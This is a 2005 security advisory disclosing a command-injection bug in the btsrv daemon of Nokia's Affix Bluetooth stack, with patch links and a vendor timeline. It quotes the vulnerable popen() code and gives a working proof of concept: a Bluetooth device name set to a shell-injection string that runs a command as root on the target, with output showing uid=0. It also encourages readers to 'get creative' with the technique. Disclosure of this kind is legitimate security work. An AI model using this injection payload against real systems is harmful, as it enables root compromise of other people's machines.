DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References: 
http://www.digitalmunition.com/DMA[2005-0826a].txt

Description: 
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in 
Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1, 
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which 
provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.

Although Nokia believes that Affix is an useful piece of software, please bear in mind that it is 
not an official Nokia product, but a result of the research activity of Nokia Research Center.

The following code snippet was found in affix-3.2.0/daemon/btsrv.c:

int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)
{
...

                err = HCI_RemoteNameRequest(fd, &dev, name);
                if (err) {
                        BTDEBUG("Name request failed: %s", hci_error(err));
...
        sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda));
        DBPRT("cmdline: [%s]", cmdline);
        fp = popen(cmdline, "r");
        if (!fp) {
                BTERROR("popen() failed");
                goto err;
        }
        err = fscanf(fp, "%s", pin);
        if (err == EOF) {
                BTERROR("fscanf() failed");
                pclose(fp);
                goto err;
        }

Exploitation of this bug is easier than the bluez variation of the same attack. When exploiting 
bluez, previous population of the bluetooth name cache is required. On Affix however the call to 
HCI_RemoteNameRequest() makes this an instant exploit regardless of the name cache. 

The btsrv daemon should obviously be started.
root@animosity:~# btsrv
btsrv: main: btsrv started [Affix 3.2.0].
btsdpd: main: btsdpd Affix 3.2.0 started.
btsrv: start_service: Bound service Dialup Networking to port 1
btsrv: start_service: Bound service Dialup Networking Emulation to port 2
btsrv: start_service: Bound service Fax Service to port 3
btsrv: start_service: Bound service LAN Access to port 4
btsrv: start_service: Bound service OBEX File Transfer to port 5
btsrv: start_service: Bound service OBEX Object Push to port 6

As an example I will use my Ipaq 2215 to attack an Affix box. First I set the bluetooth name of 
my device to ";/usr/bin/id>/tmp/ooooo;" 

Next I start the attack by opening the bluetooth manager, clicking tools and going to Paired 
devices. Next I click Add, search for the target host and then double tap it. When prompted for
a pin code I type in any random pin code and press enter. 

After a few moments I get an "Authentication failed!" message.

On the screen where btsrv was started I see the following error which indicates an attack is 
in progress. 

Traceback (most recent call last):
  File "/etc/affix/btsrv-gui", line 106, in ?
    pin = t.go("Connection from %s [%s]" %  (sys.argv[2], sys.argv[3]))
IndexError: list index out of range
sh: : command not found
btsrv: event_pin_code_request: fscanf() failed

Looking in /tmp on the target device shows successful exploitation. 
                                                       
root@animosity:~# ls -al /tmp/ooooo
-rw-r--r--  1 root root 134 2005-08-26 16:47 /tmp/ooooo
root@animosity:~# cat /tmp/ooooo
uid=0(root) gid=0(root) groups=0(root)

Feel free to get creatitve with this... http://www.digitalmunition.com/BluezHCIDpwned.txt 

Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2

Timeline:
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed bad code again!
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and fix it also asap".
08/26/2005 btsrv popen() call patch released

Outtakes:
"no, they copied from us.." - bluez
"As far as I know, we didn't borrow code...So I guess they did then" - affix

-KF